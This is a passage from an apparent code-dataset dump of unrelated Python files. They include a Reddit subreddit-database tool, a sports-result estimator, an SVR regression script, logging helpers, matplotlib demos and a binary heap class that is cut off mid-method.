2:\n\t\tfor member in nsfwyes:\n\t\t\tprint(memberformat(member), file=fileobj)\n\t\tprint('\\n' + ('#'*64 + '\\n')*5, file=fileobj)\n\n\tif nsfwmode == 2:\n\t\tfor member in nsfwq:\n\t\t\tprint(memberformat(member), file=fileobj)\n\n\ndef base36encode(number, alphabet='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'):\n \"\"\"Converts an integer to a base36 string.\"\"\"\n if not isinstance(number, (int)):\n raise TypeError('number must be an integer')\n base36 = ''\n sign = ''\n if number < 0:\n sign = '-'\n number = -number\n if 0 <= number < len(alphabet):\n return sign + alphabet[number]\n while number != 0:\n number, i = divmod(number, len(alphabet))\n base36 = alphabet[i] + base36\n return sign + base36\n\ndef base36decode(number):\n return int(number, 36)\n\ndef b36(i):\n\tif type(i) == int:\n\t\treturn base36encode(i)\n\tif type(i) == str:\n\t\treturn base36decode(i)\n\ndef search(query=\"\", casesense=False, filterout=[], subscribers=0, nsfwmode=2, idd=\"\", doreturn=False):\n\t\"\"\"\n\tSearch for a subreddit by name\n\t*str query= The search query\n\t \"query\" = results where \"query\" is in the name\n\t \"*query\" = results where \"query\" is at the end of the name\n\t \"query*\" = results where \"query\" is at the beginning of the name\n\t \"*querry*\" = results where \"query\" is in the middle of the name\n\tbool casesense = is the search case sensitive\n\tlist filterout = [list, of, words] to omit from search. Follows casesense\n\tint subscribers = minimum number of subscribers\n\tint nsfwmode=\n\t 0 - Clean only\n\t 1 - Dirty only\n\t 2 - All\n\t\"\"\"\n\n\tif idd == \"\":\n\t\tcur.execute('SELECT * FROM subreddits WHERE name !=?', ['?'])\n\t\tfetched = cur.fetchall()\n\t\tfetched.sort(key=lambda x: x[SQL_NAME].lower())\n\n\t\tresults = []\n\t\tif not casesense:\n\t\t\tquery = query.lower()\n\t\t\tfor x in range(len(filterout)):\n\t\t\t\tfilterout[x] = filterout[x].lower()\n\n\t\t#print(len(fetched))\n\t\tfor subreddit in fetched:\n\t\t\titem = subreddit[SQL_NAME]\n\t\t\tif nsfwmode==2 or (subreddit[SQL_NSFW] == \"1\" and nsfwmode == 1) or (subreddit[SQL_NSFW] == \"0\" and nsfwmode == 0):\n\t\t\t\tif not casesense:\n\t\t\t\t\titem = item.lower()\n\t\t\t\tquerl = query.replace('*', '')\n\t\t\t\tif querl in item:\n\t\t\t\t\t#print(item)\n\t\t\t\t\tif all(filters not in item for filters in filterout):\n\t\t\t\t\t\titemsplit = item.split(querl)\n\t\t\t\t\t\tif ':' in query:\n\t\t\t\t\t\t\tif (query[-1] == '*' and query[0] != '*') and itemsplit[0] == '':\n\t\t\t\t\t\t\t\tresults.append(subreddit)\n\t\t\t\t\n\t\t\t\t\t\t\tif (query[0] == '*' and query[-1] != '*') and itemsplit[-1] == '':\n\t\t\t\t\t\t\t\tresults.append(subreddit)\n\t\t\t\t\n\t\t\t\t\t\t\tif (query[-1] == '*' and query[0] == '*') and (itemsplit[0] != '' and itemsplit[-1] != ''):\n\t\t\t\t\t\t\t\tresults.append(subreddit)\n\t\t\t\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tresults.append(subreddit)\n\t\t\t\t\telse:\n\t\t\t\t\t\t#print('Filtered', item)\n\t\t\t\t\t\tpass\n\n\t\tif not doreturn:\n\t\t\tfor item in results:\n\t\t\t\titem = str(item)\n\t\t\t\titem = item.replace(\"'\", '')\n\t\t\t\tprint(item)\n\t\t\tprint()\n\t\telse:\n\t\t\treturn results\n\n\telse:\n\t\tcur.execute('SELECT * FROM subreddits WHERE idint=?', [b36(idd)])\n\t\tf = cur.fetchone()\n\t\tprint(f)\n\ndef cls():\n\tos.system('cls')\n\ndef findwrong():\n\tcur.execute('SELECT * FROM subreddits WHERE NAME!=?', ['?'])\n\tfetch = cur.fetchall()\n\tfetch.sort(key=lambda x: x[SQL_IDINT])\n\t#sorted by ID\n\tfetch = fetch[25:]\n\t\n\tpos = 0\n\tl = []\n\n\twhile pos < len(fetch)-5:\n\t\tif fetch[pos][1] > fetch[pos+1][1]:\n\t\t\tl.append(str(fetch[pos-1]))\n\t\t\tl.append(str(fetch[pos]))\n\t\t\tl.append(str(fetch[pos+1]) + \"\\n\")\n\t\tpos += 1\n\n\tfor x in l:\n\t\tprint(x)\n\ndef processjumble(count, nsfw=False):\n\tfor x in range(count):\n\t\tsub = r.get_random_subreddit(nsfw=nsfw)\n\t\tprocess(sub, isjumbled=True, doupdates=True)\n\t\t#else:\n\t\t#\tprint('Upd: ' + sub.id + ' '+ sub.display_name + ' : ' + str(sub.subscribers))\n\t\t#cur.execute('UPDATE subreddits SET JUMBLE=? WHERE ID=?', [sub.subscribers, '1', sub.id])\n\t\tsql.commit()\n\n\ndef jumble(count=20, doreturn=False, nsfw=False):\n\tnsfw = 1 if nsfw else 0\n\tcur.execute('SELECT * FROM subreddits WHERE jumble=1 AND nsfw=? ORDER BY RANDOM() LIMIT ?', [nsfw, count])\n\tfetch = cur.fetchall()\n\trandom.shuffle(fetch)\n\tfetch = fetch[:count]\n\tfetch = [f[:-1] for f in fetch]\n\tfetchstr = [i[SQL_NAME] for i in fetch]\n\tfetchstr = '+'.join(fetchstr)\n\toutput = [fetchstr, fetch]\n\tif doreturn:\n\t\treturn output\n\tprint(output[0])\n\tfor x in output[1]:\n\t\tprint(str(x).replace(\"'\", ''))\n\ndef modsfromid(subid):\n\tif 't5_' not in subid:\n\t\tsubid = 't5_' + subid\n\tsub = r.get_info(thing_id=subid)\n\tmods = list(sub.get_moderators())\n\tfor m in mods:\n\t\tprint(m)\n\treturn mods\n\ndef modernize():\n\t#cur.execute('SELECT * FROM subreddits')\n\t#f=cur.fetchall()\n\t#f.sort(key=lambda x: x[SQL_CREATED])\n\t#finalitem = f[-1]\n\tcur.execute('SELECT * FROM subreddits ORDER BY created DESC LIMIT 1')\n\tfinalitem = cur.fetchone()\n\tprint('Current final item:')\n\tprint(finalitem[SQL_IDSTR], finalitem[SQL_HUMAN], finalitem[SQL_NAME])\n\tfinalid = finalitem[SQL_IDINT]\n\n\tprint('Newest item:')\n\tnewestid = get_newest_sub()\n\tprint(newestid)\n\tnewestid = b36(newestid)\n\t\n\n\tmodernlist = []\n\tfor x in range(finalid, newestid):\n\t\tmodernlist.append(b36(x).lower())\n\tprocessmega(modernlist)\n\ndef rounded(x, rounding=100):\n\treturn int(round(x/rounding)) * rounding\n\ndef plotbars(title, inputdata, colorbg=\"#fff\", colorfg=\"#000\", colormid=\"#888\", forcezero=False):\n\t\"\"\"Create postscript vectors of data\n\n\ttitle = Name of the file without extension\n\n\tinputdata = A list of two lists. First list has the x axis labels, second list\n\thas the y axis data. x label 14 coresponds to y datum 14, etc.\n\t\"\"\"\n\tprint(' Printing', title)\n\tt=tkinter.Tk()\n\n\tcanvas = tkinter.Canvas(t, width=3840, height=2160, bg=colorbg)\n\tcanvas.pack()\n\tcanvas.create_line(430, 250, 430,1755, width=10, fill=colorfg)\n\t#Y axis\n\tcanvas.create_line(430,1750, 3590,1750, width=10, fill=colorfg)\n\t#X axis\n\n\tdkeys = inputdata[0]\n\tdvals = inputdata[1]\n\tentrycount = len(dkeys)\n\tavailablespace = 3140\n\tavailableheight= 1490\n\tentrywidth = availablespace / entrycount\n\t#print(dkeys, dvals, \"Width:\", entrywidth)\n\n\tsmallest = min(dvals)\n\tbottom = int(smallest*0.75) - 5\n\tbottom = 0 if bottom < 8 else rounded(bottom, 10)\n\tif forcezero:\n\t\tbottom = 0\n\tlargest = max(dvals)\n\ttop = int(largest + (largest/5))\n\ttop = rounded(top, 10)\n\tprint(bottom,top)\n\tspan = top-bottom\n\tperpixel = span/availableheight\n\n\tcurx = 445\n\tcury = 1735\n\n\tlabelx = 420\n\tlabely = 255\n\t#canvas.create_text(labelx, labely, text=str(top), font=(\"Consolas\", 72), anchor=\"e\")\n\tlabelspan = 130#(1735-255)/10\n\tcanvas.create_text(175, 100, text=\"Subreddits created\", font=(\"Consolas\", 72), anchor=\"w\", fill=colorfg)\n\tfor x in range(12):\n\t\tvalue = int(top -((labely - 245) * perpixel))\n\t\tvalue = rounded(value, 10)\n\t\tvalue = '{0:,}'.format(value)\n\t\tcanvas.create_text(labelx, labely, text=value, font=(\"Consolas\", 72), anchor=\"e\", fill=colorfg)\n\t\tcanvas.create_line(430, labely, 3590, labely, width=2, fill=colormid)\n\t\tlabely += labelspan\n\n\tfor entrypos in range(entrycount):\n\t\tentry = dkeys[entrypos]\n\t\tentryvalue = dvals[entrypos]\n\t\tentryx0 = curx + 10\n\t\tentryx1 = entryx0 + (entrywidth-10)\n\t\tcurx += entrywidth\n\n\t\tentryy0 = cury\n\t\tentryy1 = entryvalue - bottom\n\t\tentryy1 = entryy1/perpixel\n\t\t#entryy1 -= bottom\n\t\t#entryy1 /= perpixel\n\t\tentryy1 = entryy0 - entryy1\n\t\t#print(perpixel, entryy1)\n\t\t#print(entry, entryx0,entryy0, entryx1, entryy1)\n\t\tcanvas.create_rectangle(entryx0,entryy0, entryx1,entryy1, fill=colorfg, outline=colorfg)\n\n\t\tfont0x = entryx0 + (entrywidth / 2)\n\t\tfont0y = entryy1 - 5\n\n\t\tfont1y = 1760\n\n\t\tentryvalue = round(entryvalue)\n\t\tfontsize0 = len(str(entryvalue)) \n\t\tfontsize0 = round(entrywidth / fontsize0) + 3\n\t\tfontsize0 = 100 if fontsize0 > 100 else fontsize0\n\t\tfontsize1 = len(str(entry))\n\t\tfontsize1 = round(1.5* entrywidth / fontsize1) + 5\n\t\tfontsize1 = 60 if fontsize1 > 60 else fontsize1\n\t\tcanvas.create_text(font0x, font0y, text=entryvalue, font=(\"Consolas\", fontsize0), anchor=\"s\", fill=colorfg)\n\t\tcanvas.create_text(font0x, font1y, text=entry, font=(\"Consolas\", fontsize1), anchor=\"n\", fill=colorfg)\n\t\tcanvas.update()\n\tprint(' Done')\n\tcanvas.postscript(file='spooky\\\\' +title+\".ps\", width=3840, height=2160)\n\tt.geometry(\"1x1+1+1\")\n\tt.update()\n\tt.destroy()\n\ndef completesweep(shuffle=False, sleepy=0, query=None):\n\tif shuffle is True:\n\t\tcur2.execute('SELECT idstr FROM subreddits WHERE created > 0 ORDER BY RANDOM()')\n\telif query is None:\n\t\tcur2.execute('SELECT idstr FROM subreddits WHERE created > 0')\n\telif query == 'subscribers':\n\t\tcur2.execute('SELECT idstr FROM subreddits WHERE created > 0 ORDER BY subscribers DESC')\n\telse:\n\t\tcur2.execute(query)\n\n\ttry:\n\t\twhile True:\n\t\t\thundred = [cur2.fetchone() for x in range(100)]\n\t\t\twhile None in hundred:\n\t\t\t\thundred.remove(None)\n\t\t\tif len(hundred) == 0:\n\t\t\t\tbreak\n\t\t\t# h[0] because the selection query calls for idstr\n\t\t\t# This is not a mistake\n\t\t\thundred = [h[0] for h in hundred]\n\t\t\tprocessmega(hundred, nosave=True)\n\t\t\ttime.sleep(sleepy)\n\texcept KeyboardInterrupt:\n\t\tsql.commit()\n\texcept Exception:\n\t\tsql.commit()\n\tsql.commit()\n\ndef get_newest_sub():\n\tbrandnewest = list(r.get_new_subreddits(limit=1))[0]\n\treturn brandnewest.id","sub_path":"SubredditBirthdays/sb.py","file_name":"sb.py","file_ext":"py","file_size_in_byte":26084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"591674499","text":"from data_sources import set_load_cached\nfrom sklearn.preprocessing import StandardScaler\nfrom utils.algo_tuner import find_best_algorithms\nfrom utils.features.last_x_h2h_feature import get_last_x_h2h_feature\nfrom utils.features.last_x_h2h_in_ground_feature import get_last_x_h2h_in_ground_feature\nfrom utils.features.season_weighted_last_x_h2h_feature import get_season_weighted_last_x_h2h_feature\nfrom utils.features.last_x_matches_form_feature import get_last_x_matches_form_feature\nfrom utils.features.margin_weighted_last_x_h2h_feature import get_margin_weighted_last_x_h2h_feature\nfrom utils.features.last_x_matches_dominance_feature import get_last_x_matches_dominance_feature\nfrom utils.features.this_season_form_feature import get_this_season_matches_form_feature\nfrom utils.features.this_season_h2h_feature import get_this_season_h2h_feature\n\nset_load_cached(False)\n\nfrom data_sources import data_store\n\n__year__ = 2019\n\nmin_window_size = 5\n\n\ndef estimate(transform_scaler=True, min_season_to_train=2015, window_size=min_window_size):\n print('Load data')\n match_results, next_week_frame = data_store.get_cleaned_data()\n\n match_results['f_home_ground_adv'] = match_results['f_home_ground_adv'].apply(lambda x: 1.0 if x else 0.0)\n match_results['f_away_ground_adv'] = match_results['f_away_ground_adv'].apply(lambda x: 1.0 if x else 0.0)\n\n # Features START ---------------------------------------------------------------------------------------------------\n last_5_encounter_feature, encounter_5_matrix = get_last_x_h2h_feature(match_results, window_size)\n last_5_encounter_ground_feature, encounter_5_ground_matrix = get_last_x_h2h_in_ground_feature(match_results,\n window_size)\n season_based_last_5_encounter_feature, season_based_encounter_5_matrix = \\\n get_season_weighted_last_x_h2h_feature(match_results, window_size)\n\n last_5_match_form_feature, last_5_match_from_frame = get_last_x_matches_form_feature(match_results, window_size)\n\n last_5_matches_h2h_dominance_feature, last_5_h2h_match_dominance_frame = \\\n get_margin_weighted_last_x_h2h_feature(match_results, window_size)\n\n last_5_matches_dominance_feature, last_5_match_dominance_frame = \\\n get_last_x_matches_dominance_feature(match_results, window_size)\n\n this_season_form_feature, this_season_form_frame = get_this_season_matches_form_feature(match_results, 2021)\n\n this_season_encounter_feature, this_season_encounter_matrix = get_this_season_h2h_feature(match_results, 2021)\n\n # Features END -----------------------------------------------------------------------------------------------------\n\n match_results = match_results.merge(last_5_encounter_feature, on=\"game\")\n match_results = match_results.merge(last_5_encounter_ground_feature, on=\"game\")\n match_results = match_results.merge(season_based_last_5_encounter_feature, on=\"game\")\n match_results = match_results.merge(last_5_match_form_feature, on=\"game\", how=\"left\")\n match_results = match_results.merge(last_5_matches_h2h_dominance_feature, on=\"game\", how=\"left\")\n match_results = match_results.merge(last_5_matches_dominance_feature, on=\"game\", how=\"left\")\n match_results = match_results.merge(this_season_form_feature, on=\"game\", how=\"left\")\n match_results = match_results.merge(this_season_encounter_feature, on=\"game\", how=\"left\")\n\n # Fill Sub Calc nulls END ------------------------------------------------------------------------------------------\n match_results['f_this_season_home_form'] = match_results['f_this_season_home_form'].fillna(0.0)\n match_results['f_this_season_away_form'] = match_results['f_this_season_away_form'].fillna(0.0)\n match_results['f_this_season_h2h'] = match_results['f_this_season_h2h'].fillna(0.0)\n\n # Features Concat END ----------------------------------------------------------------------------------------------\n\n train_df = match_results[match_results.season == __year__]\n feature_cols = ['f_away_team_id', 'f_home_team_id', 'f_ground_id', 'f_home_odds', 'f_away_odds',\n 'f_home_ground_adv', 'f_away_ground_adv']\n\n calculated_stats = [f'f_last_{window_size}_h2h', f'f_last_{window_size}_h2h_in_ground',\n f'f_last_{window_size}_away_form', f'f_last_{window_size}_home_form',\n f'f_margin_weighted_last_{window_size}_h2h', f'f_last_{window_size}_home_dominance',\n f'f_last_{window_size}_away_dominance',\n 'f_this_season_home_form', 'f_this_season_away_form',\n 'f_this_season_h2h']\n\n feature_cols.extend(calculated_stats)\n\n feature_cols_original = feature_cols.copy()\n feature_cols.extend(['game'])\n\n # Create our train set\n X = match_results[match_results.season > min_season_to_train][feature_cols]\n Y = match_results.loc[match_results.season > min_season_to_train, 'result']\n\n if transform_scaler:\n scaler = StandardScaler()\n X[feature_cols_original] = scaler.fit_transform(X[feature_cols_original])\n\n print('Find the best algo')\n algorithm_perf = find_best_algorithms(X, Y, kf_splits=5)\n print(algorithm_perf.to_string())\n\n chosen_algorithms = algorithm_perf.loc[algorithm_perf['Mean Log Loss'] < 0.67]\n\n print(\"\\nWith 'Mean Log Loss' < 2/3\\n\", \"---------------------------------\\n\", chosen_algorithms.to_string())\n\n\n# Execute Estimation ---------------------------------------------------------------------------------------------------\nestimate(transform_scaler=True, min_season_to_train=2015, window_size=5)\n","sub_path":"estimator.py","file_name":"estimator.py","file_ext":"py","file_size_in_byte":5678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"423438878","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 25 16:56:54 2018\n\n@author: neetu\n\"\"\"\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('Position_Salaries.csv')\nX = dataset.iloc[:, 1:2].values\ny = dataset.iloc[:, -1].values\n\n# Splitting the dataset into the Training set and Test set\n\"\"\"from sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\"\"\"\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc_X = StandardScaler()\nsc_y = StandardScaler()\nX = sc_X.fit_transform(X)\n#convert into Column Vector\ny = sc_y.fit_transform(y.reshape(-1, 1))\n\n#Fitting the Regression Model to the dataset\n#Create Regressor here\nfrom sklearn.svm import SVR\nregressor = SVR(kernel = 'rbf')\n#Reverse back to 1D array\ny = y.ravel()\nregressor.fit(X, y)\n\n#Predicting a new result with Linear Regressor\ny_pred = regressor.predict(sc_X.transform(np.array([[6.5]])))\ny_pred = sc_y.inverse_transform(y_pred)\n\n#Visuaising Polynomial Regression results (for higher resolution and smother curve\n#X_grid = np.arange(min(X), max(X), 0.1)\n#X_grid = X_grid.reshape((len(X_grid), 1))\nplt.scatter(X, y, color = 'red')\nplt.plot(X, regressor.predict(X), color='blue')\nplt.title('Level vs Salary (SVR)')\nplt.xlabel('Level')\nplt.ylabel('Salary')\nplt.show()\n","sub_path":"Part 2 - Regression/Support Vector Regression (SVR)/svr_[Neetu].py","file_name":"svr_[Neetu].py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"218431168","text":"import datetime\nimport json\n\nname = 'server_log.txt'\n\n\ndef prepare_logfile():\n a = open(name, 'w')\n a.close()\n log(\"server log file {name} prepared.\".format(name=name), fd=False)\n\n\ndef log(to_log, fd=True):\n string_to_log = '[{timestamp}] {data}'.format(timestamp=datetime.datetime.now(), data=to_log)\n print(string_to_log)\n if fd:\n with open(name, 'a') as log_file_descriptor:\n print(string_to_log, file=log_file_descriptor)\n\n\ndef json_reader(json_path):\n with open(json_path, 'r') as fd:\n json_data = fd.read()\n json_config = json.loads(json_data)\n return json_config\n","sub_path":"StorageApp/logging_and_configuration.py","file_name":"logging_and_configuration.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"405920951","text":"#!/usr/bin/env python3\n#\n# Ryan Lamb\n# CPSC 223P-03\n#2020-10-22\n#rclamb27@csu.fullerton.edu\n\n# Examples taken from various gallery items at\n# https://matplotlib.org/gallery\n\"\"\"Matplotlib demo program changing color and lines and copying files in to the demo program\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.dates as mdates\nfrom datetime import datetime\nfrom time import sleep\n\ndef fill_between_demo():\n \"\"\"outputs 3 graphs as files and puts them into pdfs\"\"\"\n # https://matplotlib.org/3.1.0/gallery/lines_bars_and_markers/fill_between_demo.html\n # fill_between_demo.py\n x = np.arange(0.0, 2, 0.01)\n y1 = np.sin(2 * np.pi * x)\n y2 = 1.2 * np.sin(4 * np.pi * x)\n\n ###############################################################################\n fig, (ax1, ax2, ax3) = plt.subplots(3, 1, sharex=True)\n\n ax1.fill_between(x, 0, y1)\n ax1.set_ylabel('between y1 and 0')\n\n ax2.fill_between(x, y1, 1)\n ax2.set_ylabel('between y1 and 1')\n\n ax3.fill_between(x, y1, y2)\n ax3.set_ylabel('between y1 and y2')\n ax3.set_xlabel('x')\n fig.savefig(\"a.pdf\")\n ###############################################################################\n # Now fill between y1 and y2 where a logical condition is met. Note\n # this is different than calling\n # ``fill_between(x[where], y1[where], y2[where] ...)``\n # because of edge effects over multiple contiguous regions.\n\n fig, (ax, ax1) = plt.subplots(2, 1, sharex=True)\n ax.plot(x, y1, x, y2, color='black')\n ax.fill_between(x, y1, y2, where=y2 >= y1, facecolor='green', interpolate=True)\n ax.fill_between(x, y1, y2, where=y2 <= y1, facecolor='red', interpolate=True)\n ax.set_title('fill between where')\n\n # Test support for masked arrays.\n y2 = np.ma.masked_greater(y2, 1.0)\n ax1.plot(x, y1, x, y2, color='black')\n ax1.fill_between(x, y1, y2, where=y2 >= y1,\n facecolor='green', interpolate=True)\n ax1.fill_between(x, y1, y2, where=y2 <= y1,\n facecolor='red', interpolate=True)\n ax1.set_title('Now regions with y2>1 are masked')\n fig.savefig(\"b.pdf\")\n ###############################################################################\n # This example illustrates a problem; because of the data\n # gridding, there are undesired unfilled triangles at the crossover\n # points. A brute-force solution would be to interpolate all\n # arrays to a very fine grid before plotting.\n\n\n ###############################################################################\n # Use transforms to create axes spans where a certain condition is satisfied:\n\n fig, ax = plt.subplots()\n y = np.sin(4 * np.pi * x)\n ax.plot(x, y, color='black')\n\n # use data coordinates for the x-axis and the axes coordinates for the y-axis\n import matplotlib.transforms as mtransforms\n trans = mtransforms.blended_transform_factory(ax.transData, ax.transAxes)\n theta = 0.9\n ax.axhline(theta, color='green', lw=2, alpha=0.5)\n ax.axhline(-theta, color='red', lw=2, alpha=0.5)\n ax.fill_between(x, 0, 1, where=y > theta,\n facecolor='green', alpha=0.5, transform=trans)\n ax.fill_between(x, 0, 1, where=y < -theta,\n facecolor='red', alpha=0.5, transform=trans)\n fig.savefig(\"c.pdf\")\n\n plt.show()\n\ndef simple_plot():\n \"\"\"creates a simple graph with a colored line\"\"\"\n # https://matplotlib.org/3.1.0/gallery/lines_bars_and_markers/simple_plot.html#sphx-glr-gallery-lines-bars-and-markers-simple-plot-py\n # Data for plotting\n # Modified to write only to a file and close the figure.\n t = np.arange(0.0, 2.0, 0.01)\n s = 1 + np.sin(2 * np.pi * t)\n\n\n fig, ax = plt.subplots()\n ax.plot(t, s, color= \"green\")\n\n ax.set(xlabel='time (s)', ylabel='voltage (mV)',\n title='About as simple as it gets, folks')\n ax.grid()\n print('Writing out figure to simple_plot.png')\n fig.savefig(\"simple_plot.png\")\n plt.close()\n\ndef timeline():\n \"\"\"creates a timeline graph\"\"\"\n # https://matplotlib.org/gallery/lines_bars_and_markers/timeline.html#sphx-glr-gallery-lines-bars-and-markers-timeline-py\n # Modified to write only to a file and close the figure.\n\n names = ['v2.2.4', 'v3.0.3', 'v3.0.2', 'v3.0.1', 'v3.0.0', 'v2.2.3',\n 'v2.2.2', 'v2.2.1', 'v2.2.0', 'v2.1.2', 'v2.1.1', 'v2.1.0',\n 'v2.0.2', 'v2.0.1', 'v2.0.0', 'v1.5.3', 'v1.5.2', 'v1.5.1',\n 'v1.5.0', 'v1.4.3', 'v1.4.2', 'v1.4.1', 'v1.4.0']\n\n dates = ['2019-02-26', '2019-02-26', '2018-11-10', '2018-11-10',\n '2018-09-18', '2018-08-10', '2018-03-17', '2018-03-16',\n '2018-03-06', '2018-01-18', '2017-12-10', '2017-10-07',\n '2017-05-10', '2017-05-02', '2017-01-17', '2016-09-09',\n '2016-07-03', '2016-01-10', '2015-10-29', '2015-02-16',\n '2014-10-26', '2014-10-18', '2014-08-26']\n\n # Convert date strings (e.g. 2014-10-18) to datetime\n dates = [datetime.strptime(d, \"%Y-%m-%d\") for d in dates]\n levels = np.tile([-5, 5, -3, 3, -1, 1],\n int(np.ceil(len(dates)/6)))[:len(dates)]\n\n # Create figure and plot a stem plot with the date\n fig, ax = plt.subplots(figsize=(8.8, 4), constrained_layout=True)\n ax.set(title=\"Matplotlib release dates\")\n\n ax.vlines(dates, 0, levels, color=\"tab:red\") # The vertical stems.\n ax.plot(dates, np.zeros_like(dates), \"-o\",\n color=\"k\", markerfacecolor=\"w\") # Baseline and markers on it.\n\n # annotate lines\n for d, l, r in zip(dates, levels, names):\n ax.annotate(r, xy=(d, l),\n xytext=(-3, np.sign(l)*3), textcoords=\"offset points\",\n horizontalalignment=\"right\",\n verticalalignment=\"bottom\" if l > 0 else \"top\")\n\n # format xaxis with 4 month intervals\n ax.get_xaxis().set_major_locator(mdates.MonthLocator(interval=4))\n ax.get_xaxis().set_major_formatter(mdates.DateFormatter(\"%b %Y\"))\n plt.setp(ax.get_xticklabels(), rotation=30, ha=\"right\")\n\n # remove y axis and spines\n ax.get_yaxis().set_visible(False)\n for spine in [\"left\", \"top\", \"right\"]:\n ax.spines[spine].set_visible(False)\n\n ax.margins(y=0.1)\n print('Writing out figure to timeline.png')\n fig.savefig(\"timeline.png\")\n plt.close()\n\ndef line_demo_dash_control():\n \"\"\"creats a graph with customizable dashed lines\"\"\"\n # https://matplotlib.org/gallery/lines_bars_and_markers/line_demo_dash_control.html#sphx-glr-gallery-lines-bars-and-markers-line-demo-dash-control-py\n # Modified to write only to a file and close the figure.\n \"\"\"\n ==============================\n Customizing dashed line styles\n ==============================\n\n The dashing of a line is controlled via a dash sequence. It can be modified\n using `.Line2D.set_dashes`.\n\n The dash sequence is a series of on/off lengths in points, e.g.\n ``[3, 1]`` would be 3pt long lines separated by 1pt spaces.\n\n Some functions like `.Axes.plot` support passing Line properties as keyword\n arguments. In such a case, you can already set the dashing when creating the\n line.\n\n *Note*: The dash style can also be configured via a\n :doc:`property_cycle `\n by passing a list of dash sequences using the keyword *dashes* to the\n cycler. This is not shown within this example.\n \"\"\"\n import numpy as np\n import matplotlib.pyplot as plt\n\n x = np.linspace(0, 10, 500)\n y = np.sin(x)\n\n fig, ax = plt.subplots()\n\n # Using set_dashes() to modify dashing of an existing line\n line1, = ax.plot(x, y, label='Using set_dashes()')\n line1.set_dashes([3, 4, 5, 1]) # 2pt line, 2pt break, 10pt line, 2pt break\n\n # Using plot(..., dashes=...) to set the dashing when creating a line\n line2, = ax.plot(x, y + 3, dashes=[4, 3], label='Using the dashes parameter')\n\n ax.legend()\n print('Writing out figure to line_demo_dash_control.png')\n fig.savefig(\"line_demo_dash_control.png\")\n plt.close()\n\ndef main():\n \"\"\"Main function\"\"\"\n simple_plot()\n line_demo_dash_control()\n timeline()\n fill_between_demo()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"part-1/matplotlib_demo.py","file_name":"matplotlib_demo.py","file_ext":"py","file_size_in_byte":8204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"575627312","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport numpy as np\nPATH = 'abbildungen/'\nname = 'lmn_simple_interp'\n\ndef plot(data, res, err, info, figsize):\n import matplotlib.pyplot as plt\n from plottools import label_line, MARKER_DICT, L_WIDTH\n from plot import PlotterLLM\n from matplotlib.colors import Normalize\n import matplotlib.patches as patches\n import matplotlib.lines as mlines\n\n marker_dict = MARKER_DICT\n marker_dict.pop('color')\n l_width = L_WIDTH\n \n X_train, y_train, phi, phidot, X_test, P_pred = data\n X_pred = err[1]\n \n fig, axes = plt.subplots(1, 1, figsize=figsize)#, sharex=True, sharey=True)\n \n ax2 = axes\n bounds = np.array(list(zip(np.min(X_train, axis=0).tolist(), np.max(X_train, axis=0).tolist()))).tolist()\n X_err = np.sqrt(np.sum((np.rad2deg(X_test) - np.rad2deg(X_pred[:, [0, 2]]))**2, axis=1))\n X_err = np.clip(X_err, 0.0, 30)\n k = 50\n \n im = ax2.imshow(X_err.reshape((k, k)), extent=[*np.rad2deg(bounds[0]), *np.rad2deg(bounds[2])], aspect='equal',\n origin='lower', interpolation='gaussian', cmap='magma_r')\n xlim = ax2.get_xlim()\n ylim = ax2.get_ylim()\n ax2.plot(*np.rad2deg(X_train[:,[0,2]]).T, color='C7', **marker_dict, alpha=0.5)\n ax2.set_xlabel(r\"$\\varphi$ in $\\circ$\")\n ax2.set_ylabel(r\"$\\dot{\\varphi}$ in $\\nicefrac{\\circ}{\\text{s}}$\")\n fig.colorbar(im, label=\"RMSE in a.u.\", ax=ax2)\n\n ax2.set_xlim(xlim)\n ax2.set_ylim(ylim)\n \n \n plt.tight_layout()\n \nif __name__ == \"__main__\":\n import matplotlib as mpl\n mpl.use('pgf')\n import matplotlib.pyplot as plt\n from plottools import figsize, get_colors, MPL_OPTIONS\n \n plt.style.use('default')\n mpl.rcParams.update(MPL_OPTIONS)\n \n plot(*np.load(PATH + 'lmn_simple.npy'), figsize=figsize(0.65, ratio=1))\n plt.savefig(PATH + name + '.pgf')","sub_path":"abbildungen/lmn_simple_interp.py","file_name":"lmn_simple_interp.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"25886523","text":"# An implementation of a max-binary heap using an array\n\nimport math\n\nclass BinaryHeap:\n \n # The init function serves as a build heap replacement\n def __init__(self, list):\n self.array = []\n # We will have a null node at index 0 to simplify calculations\n self.array.append(None)\n for i in range (len(list)):\n self.array.append(list[i])\n firstLeaf = pow(2,math.floor(math.log(len(list),2)))\n firstParent = firstLeaf - 1\n for i in reversed(range(1, firstLeaf)):\n self.max_heapify(i) \n return\n \n def insert(self, nodeToInsert):\n self.array.append(nodeToInsert)\n childNodeIndex = len(self.array)-1\n parentNodeIndex = math.floor(childNodeIndex/2)\n while(parentNodeIndex >= 1 and self.array[parentNodeIndex] < nodeToInsert):\n temp = self.array[childNodeIndex]\n self.array[childNodeIndex] = self.array[parentNodeIndex]\n self.array[parentNodeIndex] = temp\n childNodeIndex = parentNodeIndex\n parentNodeIndex = math.floor(parentNodeIndex/2)\n \n def remove(self):\n if len(self.array)<2:\n return None\n temp = self.array[1]\n self.array[1] = self.array.pop()\n self.max_heapify(1)\n return\n \n def max(self):\n if(len(self.array)) < 2:\n return None\n 